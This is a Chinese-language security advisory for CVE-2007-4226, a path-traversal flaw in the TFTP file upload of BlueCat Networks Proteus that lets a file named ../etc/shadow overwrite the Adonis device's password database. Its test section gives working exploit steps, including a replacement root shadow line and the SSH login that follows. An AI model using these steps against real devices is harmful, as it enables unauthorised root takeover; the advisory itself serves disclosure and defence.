安全研究

安全漏洞
BlueCat Networks Proteus TFTP文件远程权限提升漏洞

发布日期:2007-08-06
更新日期:2007-08-07

受影响系统:
Bluecat Networks Proteus 2.0.2.0
Bluecat Networks Adonis 5.0.2.8
描述:
BUGTRAQ  ID: 25214
CVE(CAN) ID: CVE-2007-4226

Proteus是企业级的IP地址管理设备。

Proteus的TFTP服务器实现上存在漏洞,远程攻击者可能利用此漏洞获取服务器的root用户权限。

可以使用Proteus向所管理的Adonis设备上传文件,管理员可以命名TFTP文件,但没有对用户输入(如相对路径)执行数据验证。所上传的文件仅可拷贝到/tftpboot/目录,且文件拷贝是以root用户权限执行的,因此名为../etc/shadow的文件可以覆盖影子口令数据库/etc/shadow。

<*来源:defaultroute
  
  链接:http://secunia.com/advisories/26354/
        http://marc.info/?l=bugtraq&m=118642180732015&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

1) 在Proteus配置中创建新的TFTP组
2) 添加TFTP部署角色,指定Adonis设备到组中
3) 在新TFTP组的顶级文件夹,添加名为../etc/shadow的文件并加载包含有以下行的文件:
  
     root:Im0Zgl8tnEq9Y:13637:0:99999:7:::

4) 向Adonis设备部署配置
5) 现在可以口令bluecat以root权限登录到Adonis设备:

     $ ssh root@192.168.1.11
     root@192.168.1.11's password:
     # cat /etc/shadow
     root:Im0Zgl8tnEq9Y:13637:0:99999:7:::

注释:这个示例假设启用了SSH,iptable允许TCP/22端口。

建议:
临时解决方法:

* 禁止管理员的TFTP访问。

厂商补丁:

Bluecat Networks
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.bluecatnetworks.com/

浏览次数:3323
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障